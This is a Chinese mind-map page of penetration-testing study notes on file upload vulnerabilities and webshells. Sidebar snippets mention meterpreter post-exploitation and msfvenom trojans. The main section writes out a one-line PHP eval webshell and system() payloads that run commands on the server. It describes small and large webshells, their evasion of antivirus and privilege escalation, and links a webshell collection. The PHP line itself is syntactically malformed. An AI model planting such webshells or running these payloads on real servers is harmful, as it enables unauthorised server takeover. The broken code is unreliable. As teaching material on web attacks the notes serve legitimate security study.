导图社区 1.文件上传
这是一篇关于1.文件上传的思维导图,主要内容有文件上传漏洞原理、Webshell介绍。
后渗透之meterpretermeterpreter常用命令1.基本命令2.文件系统命令3.网络命令4.键盘监听5.系统命令6.mimikatz7.网络嗅探8.获取敏感信息9.获取 Hash10.通过 Hash 获..
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作 首先,我们使用metasploit中的另一个后门工具msfvenom生成一个木马...
第一步:终端启动MSFCONSOLE 以管理员身份运行 sudo msfconsole 出现msf提示符了,就登录成功了 第二步:寻找模块 使用search加上自己想找的模块(相当于模糊查询) 使用search命令搜索所有有效的Linux模块 search linux
社区模板帮助中心,点此进入>>
论语孔子简单思维导图
《傅雷家书》思维导图
《童年》读书笔记
《茶馆》思维导图
《朝花夕拾》篇目思维导图
《昆虫记》思维导图
《安徒生童话》思维导图
《鲁滨逊漂流记》读书笔记
《这样读书就够了》读书笔记
妈妈必读:一张0-1岁孩子认知发展的精确时间表
文件上传
文件上传漏洞原理
文件上传场景
上传头像
上传代码
上传图片
上传简历
上传附件
一句话木马
<?php @eval($_POST['wuya'];?)>
@:忽略错误
$_POST:获得POST请求的参数值
eval:执行代码
system:执行系统命令
payload
wuya=system(ipconfig);
wuya=system("tree c:\\");
Webshell介绍
分类
代码短,只有一行代码
场景多,可以单独生成文件,也可以插入到图片中
安全性高,隐匿性强,可变形免杀
小马
体积小,功能少。只有文件上传功能。
大马
体积大,功能全。能够管理数据库、文件管理、对站点进行快速的收集,甚至能够提权
项目
https://github.com/tennc/webshell